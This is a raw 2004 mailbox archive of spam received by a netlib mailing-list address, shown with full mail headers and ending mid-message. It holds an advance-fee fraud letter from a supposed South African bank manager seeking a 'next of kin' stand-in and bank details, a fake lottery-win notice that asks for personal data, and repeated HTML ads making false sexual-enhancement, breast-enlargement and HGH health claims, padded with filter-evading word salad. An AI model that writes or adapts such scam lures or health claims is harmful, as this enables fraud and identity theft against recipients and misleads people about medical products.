Reply-To: mende2000@tiscali.co.uk
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Thu, 8 Jan 2004 14:59:11 +0000
Subject: (    )
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id i08GwFMN028117

Dear Sir/ Madam
I am Mr. Fredrick Mende, Provincial Manager Standard Bank
of South Africa, Capetown, Branch. I have urgent and very
confidential
business proposition for you. On June 6, 2000, a foreign mining
consultant/contractor with the South Africa Mining Corporation, Mr.
Richard
Moss made a numbered time (Fixed) Deposit for twelve calendar months,
valued at US$12,500,000.00 (twelve and half Million Dollars) in my
branch.
Upon maturity, I sent a routine notification to his forwarding
address but
got no reply. After a month, we sent a reminder and finally we
discovered
from his contract employers, the South Africa Mining Corporation that
Mr.
Richard Moss died from an automobile accident. On further
investigation, I
found out that he died without making a WILL, and all attempts to
trace his
next of kin was fruitless. I therefore made further investigation and
discovered that Mr. Richard Moss did not declare any !
kin or relations in all his official documents, including his Bank
Deposit
paperwork in my Bank. This sum of US$12,500,000.00 is still sitting
in my
Bank and the interest is being rolled over with the principal sum at
the
end of each year. No one will ever come forward to claim it.
According to
South African Law, at the expiration of 5 (five) years, the money
will
revert to the ownership of the South Africa Government if nobody
applies to
claim the fund. Consequently, my proposal is that I will like you as
a
foreigner to stand in as the next of kin to Mr. Richard Moss so that
the
fruits of this old man's labour will not get into the hands of some
corrupt
government officials. This is simple, I will like you to provide
immediately your full names and address so that the Attorney will
prepare
the necessary documents and affidavits which will put you in place as
the
next of kin. We shall employ the service of two Attorneys for
processing
and no!
tarization of the WILL and to obtain the necessary documents and
letter of
probate/administration in your favour for the transfer. A bank
account in
any part of the world which you will provide will then facilitate the
transfer of this money to you as the beneficiary/next of kin. The
money
will be paid into your account for us to share in the ratio of 60%
for me
and 40% for you. There is no risk at all as all the paperwork for
this
transaction will be done by the Attorney and my position as the
Branch
Manager guarantees the successful execution of this transaction. If
you are
interested, please reply immediately via the private email address
below . Upon your response, I shall then provide
you
with more details and relevant documents that will help you
understand the
transaction. Please observe utmost confidentiality, and rest assured
that
this transaction would be most profitable for both of us because I
shall
require your!
assistance to invest my share in your country. Awaiting your urgent
reply
via my email: mende2000@ecplaza.net

Thanks and regards.
Mr. Fred Mende.






From swqaxqnanzb@yahoo.com Thu Jan  8 20:30:56 2004
Return-Path: <swqaxqnanzb@yahoo.com>
Received: from 12-216-25-189.client.mchsi.com (12-216-25-189.client.mchsi.com [12.216.25.189])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i091UgMN007736;
	Thu, 8 Jan 2004 20:30:47 -0500 (EST)
Received: from [9.193.16.88] by 12.216.25.189 with HTTP;
	Fri, 09 Jan 2004 20:26:50 +0500
From: "Lenora Felton" <swqaxqnanzb@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Quick there she is ! Now impess her,,
Mime-Version: 1.0
X-Mailer: buff positive messiah 
Date: Fri, 09 Jan 2004 21:26:50 +0600
Reply-To: "Lenora Felton" <swqaxqnanzb@yahoo.com>
Content-Type: multipart/alternative;
	boundary="031155067998015926"
Message-Id: <JDWGQSC-0001494102596@fanfare>

--031155067998015926
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

vhf democrat rise catholicism paraboloid chambermaid bony 
repute domesticate formosa qualitative 
electrocardiogram spearmint glum kindle brandenburg alai ongoing epiphysis mulch 
extralinguistic trance jumpy euclid sunken thrifty scoot inferior egyptian 
sang shrew abacus intemperance inauspicious tid conductance candy drag detail 
appendices abrupt banks biochemic quarrel thereunder ohm 

--031155067998015926
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 8bit

<html>
<body bgcolor="#000000" text="#000000" link="#00FF00" vlink="#00FF00" alink="#00FF00">
<center><h3><font color="#FFFFFF" face="verdana">You can be an ALL NIGHT sex machine !</font></h3></center><center><h4><font color="#FF00FF" face="verdana">Finally available to the public<br>The supplement that's made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color="#FFFFFF" face="verdana">Make love to her like no other man 
    can<br>Over and over again  All night long!<br>With multiple orgasms and massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many times with many different women!<br><br><CENTER><h5><font color="#FF00FF" face="verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><br>
    Now you too can have incredible multiple orgasmic sex over and over again<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Porn</FONT></H5></CENTER><CENTER><h5><font color="#FF00FF" face="verdana">**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color="#FFFFFF" face="verdana">Increase your testosterone 500%<br>Increase your sex drive---Increase your virility<br>Dramatically increase the amount of semen you ejaculate<br>Never again experience premature ejaculation<br>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly recommended for older men with younger women in their lives ! </font></h5><h2><a href="http://www.whokz.info/alpha/?buster">For Fantastic sex Click here!</a></h2></center>
	<br><center><a href="http://www.amyz.info/pher/o.html">Not interested? Please Click here</a></center>
mud
</body>
</html>


--031155067998015926--

From ddxidhi@yahoo.com Thu Jan  8 20:41:44 2004
Return-Path: <ddxidhi@yahoo.com>
Received: from adsl-68-77-187-135.dsl.wotnoh.ameritech.net (adsl-68-77-187-135.dsl.wotnoh.ameritech.net [68.77.187.135])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i091fhMN007863;
	Thu, 8 Jan 2004 20:41:43 -0500 (EST)
Received: from [62.240.46.122] by 68.77.187.135 with HTTP;
	Fri, 09 Jan 2004 20:38:50 +0500
From: "Marie Gill" <ddxidhi@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Your girl will love you and alpha
Mime-Version: 1.0
X-Mailer: decorum buddha 
Date: Fri, 09 Jan 2004 12:37:50 -0300
Reply-To: "Marie Gill" <ddxidhi@yahoo.com>
Content-Type: multipart/alternative;
	boundary="17202934190575107"
Message-Id: <VCLHWMK-0008773910717@doll>

--17202934190575107
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

hulk willoughby hewitt scot brush bloodhound tarnish bellini lengthy fischbein 
could clockwise immature griddle caviness doughnut postscript weight wretch 
electrocardiogram dog cruickshank kulak irish prophetic southampton slapstick 
ahoy glutamic actuarial poliomyelitis 
courtney economy edible southern durkin 
resident pocketful snip schlieren millie alpine hurray 

--17202934190575107
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 8bit

<html>
<body bgcolor="#000000" text="#000000" link="#00FF00" vlink="#00FF00" alink="#00FF00">
<center><h3><font color="#FFFFFF" face="verdana">You can be an ALL NIGHT sex machine !</font></h3></center><center><h4><font color="#FF00FF" face="verdana">Finally available to the public<br>The supplement that's made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color="#FFFFFF" face="verdana">Make love to her like no other man 
    can<br>Over and over again  All night long!<br>With multiple orgasms and massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many times with many different women!<br><br><CENTER><h5><font color="#FF00FF" face="verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><br>
    Now you too can have incredible multiple orgasmic sex over and over again<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Porn</FONT></H5></CENTER><CENTER><h5><font color="#FF00FF" face="verdana">**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color="#FFFFFF" face="verdana">Increase your testosterone 500%<br>Increase your sex drive---Increase your virility<br>Dramatically increase the amount of semen you ejaculate<br>Never again experience premature ejaculation<br>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly recommended for older men with younger women in their lives ! </font></h5><h2><a href="http://www.whokz.info/alpha/?buster">For Fantastic sex Click here!</a></h2></center>
	<br><center><a href="http://www.amyz.info/pher/o.html">Not interested? Please Click here</a></center>
burly
</body>
</html>


--17202934190575107--

From eqrxdzuarq@yahoo.com Fri Jan  9 07:48:48 2004
Return-Path: <eqrxdzuarq@yahoo.com>
Received: from 160.36.58.108 ([61.97.29.193])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i09CmgMN022129;
	Fri, 9 Jan 2004 07:48:45 -0500 (EST)
Received: from 192.201.117.176 by 61.97.29.193; Sat, 10 Jan 2004 01:42:51 -0100
Message-ID: <LRTZHNWZSVELERJOBGIYN@yahoo.com>
From: "Rhonda Foster" <eqrxdzuarq@yahoo.com>
Reply-To: "Rhonda Foster" <eqrxdzuarq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Message subject
Date: Sat, 10 Jan 2004 07:41:51 +0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--5679671829880253644"
X-Priority: 3
X-MSMail-Priority: Normal

----5679671829880253644
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" text="#000099" link="#0000FF" alink="0000ff" vlink="#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for thousands of positive results in Europe <br>Hundreds of thousands of women are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br>
     that we gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</H2></center><br>
     <center><h2><a href="http://www.craigz.us/breast/?buster">This way to a new figure safely!</a></H2><br>
<a href="http://www.craigz.us/pher/o.html ">Not interested?<br>Please click here</a>
</center>
chandelier
</body>
</html>


----5679671829880253644--


From cesietddg@yahoo.com Fri Jan  9 08:00:29 2004
Return-Path: <cesietddg@yahoo.com>
Received: from XKJ ([219.138.179.118])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i09D06MN022434;
	Fri, 9 Jan 2004 08:00:19 -0500 (EST)
Received: from 44.208.24.179 by 219.138.179.118; Sat, 10 Jan 2004 03:52:24 +0100
Message-ID: <MCWCCZOUKUSPWCFQTGHVVLW@yahoo.com>
From: "Demetrius Mcclain" <cesietddg@yahoo.com>
Reply-To: "Demetrius Mcclain" <cesietddg@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Message subject
Date: Sat, 10 Jan 2004 05:54:24 +0300
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--9501942554546628794"
X-Priority: 3
X-MSMail-Priority: Normal

----9501942554546628794
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" text="#000099" link="#0000FF" alink="0000ff" vlink="#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for thousands of positive results in Europe <br>Hundreds of thousands of women are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br>
     that we gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</H2></center><br>
     <center><h2><a href="http://www.jonnyz.us/breast/?buster">This way to a new figure safely!</a></H2><br>
<a href="http://www.jonnyz.us/pher/o.html ">Not interested?<br>Please click here</a>
</center>
nco
</body>
</html>


----9501942554546628794--


From sdavies@lotterycommission.org Fri Jan  9 10:42:57 2004
Return-Path: <sdavies@lotterycommission.org>
Received: from helimore792.com (host81-136-49-156.in-addr.btopenworld.com [81.136.49.156])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i09FgsMN025571
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 9 Jan 2004 10:42:55 -0500 (EST)
Message-Id: <200401091542.i09FgsMN025571@netlib2.cs.utk.edu>
From: "SUSAN DAVIS" <sdavies@lotterycommission.org>
Reply-To: p_marsh2003@tiscali.co.uk
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Fri, 9 Jan 2004 15:43:26 +0000
Subject: WINNING NOTIFICATION
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id i09FgsMN025571

INTERNATIONAL LOTTERY PRIZE RELEASE CENTRE
WINNING NOTIFICATION
Date: 06/01/04
Ref: 475061725
Batch: 7056490902/188
Winning no: GB8701/LPRC


CONGRATULATIONS
Dear Sir/Madam, 

We are delighted to inform you of your prize release on the 06TH
January 2004 from the Australian International Lottery programme.
Which is fully based on an electronic selection of winners using their
e-mail addresses
Your name was attached to ticket number;
47061725 07056490902 serial number 7741137002

This batch draws the lucky numbers as follows 5-13-33-37-42 bonus number
17,which consequently won the lottery in the second category. You hereby
have been approved a lump sum pay of US$1,000,000.00 (ONE MILLION
DOLLARS) 
in cash credit file ref: ILP/HW 47509/02 from the total cash prize of
US$8,000,000.00 shared amongst eight lucky winners in this category.
All participant were selected through a computer balloting system drawn
form Nine hundred thousand E-mail addresses from Canada, Australia, United
States, Asia,

Europe, Middle East, Africa and Oceania as part of our international
promotions program which is conducted annually.

This Lottery was promoted and sponsored by a conglomerate of some
multinational companies as part of their social responsibility to the
citizens in the
communities where they have operational base.

Further more your details(e-mail address) falls within our European
representative office
in Amsterdam, Holland, as indicated in your play coupon and your prize of
US$1,000,000.00 will be released to you from this regional branch office in
Amsterdam.


HOW TO CLAIM YOUR PRIZE

simply contact our fiducial agent, Mr. Peter Marsh at
p_marsh2003@tiscali.co.uk
 to file for your claim. Please quote your reference, batch and winning
number which
can be found on the top left corner of this notification as well as your
full name, address and telephone number to help locate your file easily.

For security reasons, we advice all winners to keep this information
confidential from the public until your claim is processed and your
prize released to you. This is part of our security protocol to avoid double
claiming and unwarranted taking advantage of this programme by
non-participant or unofficial personnel.
Note, all winnings MUST be claimed by the 15th of JANUARY 2004; 
otherwise all funds will be returned as Unclaimed and eventually donated to
charity

Congratulations once again on your winnings!!!

Best Regards
Susan Davies (co-coordinator)

PLEASE DO NOT REPLY TO THIS EMAIL.CONTACT YOUR CLAIMS
AGENT.p_marsh2003@tiscali.co.uk
ANY BREACH OF CONFIDENTIALITY ON THE PART OF THE WINNERS WILL RESULT TO
DISQUALIFICATION.




From rcqrnlwrtiebb@yahoo.com Sat Jan 10 02:47:18 2004
Return-Path: <rcqrnlwrtiebb@yahoo.com>
Received: from V7O4O0 ([61.171.237.53])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0A7l9MN011504;
	Sat, 10 Jan 2004 02:47:13 -0500 (EST)
Received: from 160.50.38.49 by 61.171.237.53; Sat, 10 Jan 2004 19:42:18 -0200
Message-ID: <KPLCOQMESCMRTWIIRBBCHAASN@yahoo.com>
From: "Miguel Crowell" <nlwamrkt@yahoo.com>
Reply-To: "Miguel Crowell" <xrixav@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: 'Healthy thick hair
Date: Sat, 10 Jan 2004 14:37:18 -0700
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--39102641391649073"
X-Priority: 3
X-MSMail-Priority: Normal

----39102641391649073
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#000099" text="#FFFFFF" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<center><h4><font color="#FFFFFF" face="verdana">Bob Hope, JFK, Marilyn Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h4></center><center><h5><font color="#FFFFFF" face="verdana">Long healthy lives full of fun and excitement !<br>And they look SO GOOD at their age !<br>Healthy, young, radiant, slim and trim !<br>  HGH is the answer !<br>HGH replenishes what time takes away !<br>HGH helps them and NOW YOU<br>to "be the best" that you can possibly be !<br>
   
    <br>Ever wonder how certain celebrities manage to look so young and thin at their age??</font></h5>
</center><center><h3><font color="#FFCC00" face="verdana">HGH is the guaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></center><br><center><H3><font color="#FF00FF" face="verdana"><a href="http://www.amyz.info/hgh/?buster">Learn More This way</a></font></h3><br><br><a href="http://www.amyz.info/pher/o.html">Not interested?<br>Please click here</a></center>
alive
</body>
</html>


----39102641391649073--


From dfelzjrqoek@yahoo.com Sat Jan 10 03:00:20 2004
Return-Path: <dfelzjrqoek@yahoo.com>
Received: from 61-229-169-158.HINET-IP.hinet.net (61-229-169-158.HINET-IP.hinet.net [61.229.169.158])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0A7xpMN011627;
	Sat, 10 Jan 2004 03:00:02 -0500 (EST)
Received: from 84.11.160.47 by 61.229.169.158; Sat, 10 Jan 2004 20:50:04 -0100
Message-ID: <GJBEIPZATSDGHAUNAWFSYM@yahoo.com>
From: "Gregg Purvis" <gszrfrsor@yahoo.com>
Reply-To: "Gregg Purvis" <ezmnzbhj@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: ..Top athletes agree
Date: Sat, 10 Jan 2004 16:54:04 -0500
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--7061660167766247248"
X-Priority: 3
X-MSMail-Priority: Normal

----7061660167766247248
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#000099" text="#FFFFFF" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<center><h4><font color="#FFFFFF" face="verdana">Bob Hope, JFK, Marilyn Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h4></center><center><h5><font color="#FFFFFF" face="verdana">Long healthy lives full of fun and excitement !<br>And they look SO GOOD at their age !<br>Healthy, young, radiant, slim and trim !<br>  HGH is the answer !<br>HGH replenishes what time takes away !<br>HGH helps them and NOW YOU<br>to "be the best" that you can possibly be !<br>
   
    <br>Ever wonder how certain celebrities manage to look so young and thin at their age??</font></h5>
</center><center><h3><font color="#FFCC00" face="verdana">HGH is the guaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></center><br><center><H3><font color="#FF00FF" face="verdana"><a href="http://www.amyz.info/hgh/?buster">Learn More This way</a></font></h3><br><br><a href="http://www.amyz.info/pher/o.html">Not interested?<br>Please click here</a></center>
armhole
</body>
</html>


----7061660167766247248--


From hollywoodmovies@msn.com Sun Jan 11 18:36:05 2004
Return-Path: <hollywoodmovies@msn.com>
Received: from ip-129-15-121-185.walker2.ou.edu (ip-129-15-121-185.walker2.ou.edu [129.15.121.185])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0BNa4MN023748;
	Sun, 11 Jan 2004 18:36:04 -0500 (EST)
Received: from 36.178.92.195 by 129.15.121.185; Mon, 12 Jan 2004 09:34:09 -0400
Message-ID: <HLANONGFGHAOYNCJVDWRN@yahoo.com>
From: "Hershel Parra" <hollywoodmovies@msn.com>
Reply-To: "Hershel Parra" <hollywoodmovies@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: .Men. Increase your testosterone 500% !!
Date: Mon, 12 Jan 2004 11:30:09 -0200
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--1167734856843606"
X-Priority: 3
X-MSMail-Priority: Normal

----1167734856843606
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>wotan
<body bgcolor="#000000" text="#000000" link="#00FF00" vlink="#00FF00" alink="#00FF00">
<center><h3><font color="#FFFFFF" face="verdana">You can be an ALL NIGHT sex machine !</font></h3></center><center><h4><font color="#FF00FF" face="verdana">Finally available to the public<br>The supplement that's made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color="#FFFFFF" face="verdana">Make love to her like no other man 
    can<br>Over and over again  All night long!<br>With multiple orgasms and massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many times with many different women!<br><br><CENTER><h5><font color="#FF00FF" face="verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><br>
    Now you too can have incredible multiple orgasmic sex over and over again<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Porn</FONT></H5></CENTER><CENTER><h5><font color="#FF00FF" face="verdana">**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color="#FFFFFF" face="verdana">Increase your testosterone 500%<br>Increase your sex drive---Increase your virility<br>Dramatically increase the amount of semen you ejaculate<br>Never again experience premature ejaculation<br>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly recommended for older men with younger women in their lives ! </font></h5><h2><a href="http://www.amyz.info/alpha/?buster">For Fantastic sex Click here!</a></h2></center>
	<br><center><a href="http://www.amyz.info/pher/o.html">Not interested? Please Click here</a></center>
haugen
</body>
</html>


----1167734856843606--


From hollywoodmovies@msn.com Sun Jan 11 21:49:13 2004
Return-Path: <hollywoodmovies@msn.com>
Received: from z42.ziemowit.ds.polsl.gliwice.pl (z42.ziemowit.ds.polsl.gliwice.pl [157.158.184.42])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0C2n0MN027490;
	Sun, 11 Jan 2004 21:49:08 -0500 (EST)
Received: from 88.204.188.24 by 157.158.184.42; Mon, 12 Jan 2004 18:41:12 +0200
Message-ID: <HUVERVQZMBMPHOYPGZFZGZZGS@yahoo.com>
From: "Quinn Zimmerman" <hollywoodmovies@msn.com>
Reply-To: "Quinn Zimmerman" <hollywoodmovies@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: /Be. a Sx Machine
Date: Mon, 12 Jan 2004 15:42:12 -0100
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--4322188583519931"
X-Priority: 3
X-MSMail-Priority: Normal

----4322188583519931
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit

<html>cellophane
<body bgcolor="#000000" text="#000000" link="#00FF00" vlink="#00FF00" alink="#00FF00">
<center><h3><font color="#FFFFFF" face="verdana">You can be an ALL NIGHT sex machine !</font></h3></center><center><h4><font color="#FF00FF" face="verdana">Finally available to the public<br>The supplement that's made Male Porn Stars famous!</font></h4></center><center>
  <h5><font color="#FFFFFF" face="verdana">Make love to her like no other man 
    can<br>Over and over again  All night long!<br>With multiple orgasms and massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many times with many different women!<br><br><CENTER><h5><font color="#FF00FF" face="verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><br>
    Now you too can have incredible multiple orgasmic sex over and over again<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Porn</FONT></H5></CENTER><CENTER><h5><font color="#FF00FF" face="verdana">**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color="#FFFFFF" face="verdana">Increase your testosterone 500%<br>Increase your sex drive---Increase your virility<br>Dramatically increase the amount of semen you ejaculate<br>Never again experience premature ejaculation<br>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly recommended for older men with younger women in their lives ! </font></h5><h2><a href="http://www.amyz.info/alpha/?buster">For Fantastic sex Click here!</a></h2></center>
	<br><center><a href="http://www.amyz.info/pher/o.html">Not interested? Please Click here</a></center>
afghanistan
</body>
</html>


----4322188583519931--


From incredihealth@msn.com Mon Jan 12 07:53:54 2004
Return-Path: <incredihealth@msn.com>
Received: from DARK-XIAN ([219.145.110.49])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0CCrkMN016656;
	Mon, 12 Jan 2004 07:53:49 -0500 (EST)
Received: from [133.77.101.41] by DARK-XIAN with SMTP; Tue, 13 Jan 2004 07:50:01 +0500
Message-ID: <9da2m5-7p6$714s-41d@o84fngz5>
From: "Melvin Eldridge" <incredihealth@msn.com>
Reply-To: "Melvin Eldridge" <incredihealth@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Tone and Firm naturally!-distal
Date: Tue, 13 Jan 04 07:50:01 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C3A9BDF_D2AC.C"
X-Priority: 3
X-MSMail-Priority: Normal


--C3A9BDF_D2AC.C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>candide,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=
,,,,,,,,,,,,,,,,,,,,,,,,,,,,
<head>robbins
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#FF0000" alink=3D"FF000=
0" vlink=3D"#FF0000">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way for a safe and natural solution!</a></H2></center>
<center><a href=3D"http://www.amyz.info/pher/o.html">Not interested? Pleas=
e click here</a></center>
taxpayer
</body>
</html>

--C3A9BDF_D2AC.C--


From cawssdelkb@yahoo.com Mon Jan 12 08:13:22 2004
Return-Path: <cawssdelkb@yahoo.com>
Received: from ilm56-192-103.ec.rr.com (ilm56-192-103.ec.rr.com [66.56.192.103])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0CDDLMN017163;
	Mon, 12 Jan 2004 08:13:21 -0500 (EST)
Received: from [146.40.68.110] by 66.56.192.103 with HTTP;
	Tue, 13 Jan 2004 08:03:26 +0500
From: "Nellie Mckinney" <cawssdelkb@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: ,,Top athletes reveal secrets,,
Mime-Version: 1.0
X-Mailer: tambourine 
Date: Tue, 13 Jan 2004 04:06:26 +0100
Reply-To: "Nellie Mckinney" <cawssdelkb@yahoo.com>
Content-Type: multipart/alternative;
	boundary="4682264989981228850"
Message-Id: <SOJRCJG-0000775996104@bamberger>

--4682264989981228850
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

bayed convene ballet bit marsh script promethean previous bike 
blandish laocoon evensong monaco 
partook monetary hickman mensurable descent juniper dualism amount 
ferrous languish duplicity sterno unitary textron radii handhold strap adulate 
potentate begetting foster isotherm sagacious evoke 
vie galatea characteristic selectric 

--4682264989981228850
Content-Type: text/html; charset=us-ascii
